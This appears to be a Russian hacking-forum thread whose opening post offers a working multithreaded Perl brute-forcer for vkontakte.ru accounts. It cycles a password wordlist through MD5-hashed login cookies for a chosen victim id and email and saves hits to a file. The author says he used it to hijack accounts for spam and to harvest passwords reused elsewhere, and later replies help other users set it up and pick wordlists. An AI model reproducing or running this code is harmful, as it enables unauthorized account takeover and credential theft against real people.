vkontakte.ru брут - финал

[C!klodoL]

И так сегодня павел дуров закрыл багу в печенюшках которая позволяла логинится по кукам не зная мыла и следовательно перебирать пароли, но зная мыло всё же можно брутить юзера:fuck: и так мой финальный брутфорс для контакта, сделал многопоточность, у меня на 110кбит при 4 потоках перебирало около 50 000 паролей в час :)

Код:

#!/usr/bin/perl

use IO::Socket;
use MD5;
use threads;
use threads::shared;
my @pass : shared;

######################################
# C!klodoL
# vkontakte.ru bruteforce with multi-threads :)
######################################
$dic = 'passl.txt';		#словарь паролей
$id = 111111;		#id цели
$mail = 'mail%40mail.com';	#мыло, вместо @ вписать %40
$threads = 4;		#количество потоков
######################################

open (pass, "<$dic");

Next:
@pass = pass();

for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);}
for(@trl) { $_->join; }

sub Brut
{

while (@pass){

$pass = shift @pass;

$md5 = MD5->hexhash($pass);
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80);
print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n".
	"Host: vkontakte.ru\r\n".
            "Accept: */*\r\n".
            "Content-Type: application/x-www-form-urlencoded\r\n".
            "User-Agent: Mozillo\r\n".
            "Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n".
            "Connection: close\r\n\r\n";
$answ = <$sock>;
close $sock;
print "$pass  $answ";
if ($answ =~ /302/){
open (good, '>>good.txt');
print good "$id:$pass:$md5\n";
print "$id:$pass:$md5\n";
close good;
exit;}
}

}

goto Next;

sub pass
{
	my (@mas);
	while (<pass>){
	push @mas, $_;
	last if (@mas == 400);
	}
	chomp @mas;
	return @mas;
}

[.fry]

.....

[Fly]

Я наверно чот пропустил, но зачем брутить вконтакте.ру?
ЗЫ: если только как пример...

[#define TRUE FALSE]

Цитата:

Сообщение от Fly

Я наверно чот пропустил

угу...тема

Цитата:

Web програмирование PHP, Perl, JavaScript, HTML, CGI, ASP, MySQL, etc.

[C!klodoL]

Цитата:

но зачем брутить вконтакте.ру?

пока паша не исправил багу в куках я брутил акки по диапазону для спама, ну а так контакт можно брутить для получения пароля в надежде что жертва его еще где то использует, например у ылитного пятизнака 8)

[alkos]

Цитата:

Сообщение от C!klodoL

пока паша не исправил багу в куках я брутил акки по диапазону для спама, ну а так контакт можно брутить для получения пароля в надежде что жертва его еще где то использует, например у ылитного пятизнака 8)

Пипец, мы все под колпаком...:blink:

[marco_tullio]

мне мне надо брутить контакт!
только объясните как юзать тот код который приведен
пожалуйста!

Добавлено через 17 минут
и еще - у контакта есть какая то логика при раздаче паролей?
если представить что человек не менял его на свой - но какой лучше словарь использовать??
спасибо

Добавлено через 18 минут
и еще - у контакта есть какая то логика при раздаче паролей?
если представить что человек не менял его на свой - но какой лучше словарь использовать??
спасибо

Добавлено через 19 минут
хотел написать ТО какой лучше словарь использовать

[belchak]

А он у меня чё-то не пашет говорит следующее:

Цитата:

Can't locate threads.pm in @INC (@INC contains: C:/Perl/lib C:/Perl/site/lib .)
at kontakt.pl line 5.
BEGIN failed--compilation aborted at kontakt.pl line 5.

[C!klodoL]

marco_tullio
качаем Perl c activestate.com, ставим, сохраняем код как brut.pl не забыв указать необходимые параметры в скрипте
belchak
у тебя перл старье, без поддержки потоков, скачай новый

а вообще по моему там теперь ввели бан за частые запросы

[manny]

вероянто, это тот самы случай, когда кривые руки голове покоя не дают, но, тем не менее, отважусь задать вопрос) значит, вписываю мыло, вписываю id, запускаю скрипт. В принципе, ошибок он не мне выдает, даже запускается. Решительно непонятно только делает ли он что-нибудь. Сетевой монитор с его стороны активности не замечает, хотя траффик, по идее, должен быть приличный. Мож я исходники плохо читал?..=\

[vovan-f]

Скиньте первый пост вочтапу в личку ;)

[vo4tap]

что ты этим хотел сказать?
просто пооффтопить или может съязвить?

[manny]

мужчины, я-таки исчо раз попрошу оценить кривизну моих рук))

[b3n3d1kt]

Неблагородное это дело брутить такой сайт...
Павел Дуров для людей старается...даже рекламу на сайт не вешает...в общем ***** Вы!
Извините уж, конечно, но это моё мнение!

[manny]

у меня вопрос п теме, но из серии дурацких. почему нельзя перед goto next написать $md5->finish(); шоб оперативка не набивалась значениями дескриптора?

[C!klodoL]

manny может фаерволл какой там блочит, может еще что, я то не телепат, а вообще ты какой то подозрительный =/ то скрипт запустить не можешь, а вдруг про дескрипторы знаешь

>Павел Дуров для людей старается
ога, и миралабис для людей старается, давайте его не будем брутить, и гилл бейц стараеццо, давайте не будет п.. винду. а вообще я хз для кого павел старается, но то что фото и видео там сохраняются после их удаления это факт 8) Бесплатный сыр только в мышеловке, помним? 8)

[6yrara]

_http://forum.asechka.ru/showthread.php?t=101924
После этой тему вы тоже скажете, что брутить акки тупость? =))

[[Elite] Crash]

Цитата:

Сообщение от C!klodoL

marco_tullio
............
а вообще по моему там теперь ввели бан за частые запросы

точно?

[De$p]

лучшеб автозаполнятель инфы написали ... imho более полезен и актуален.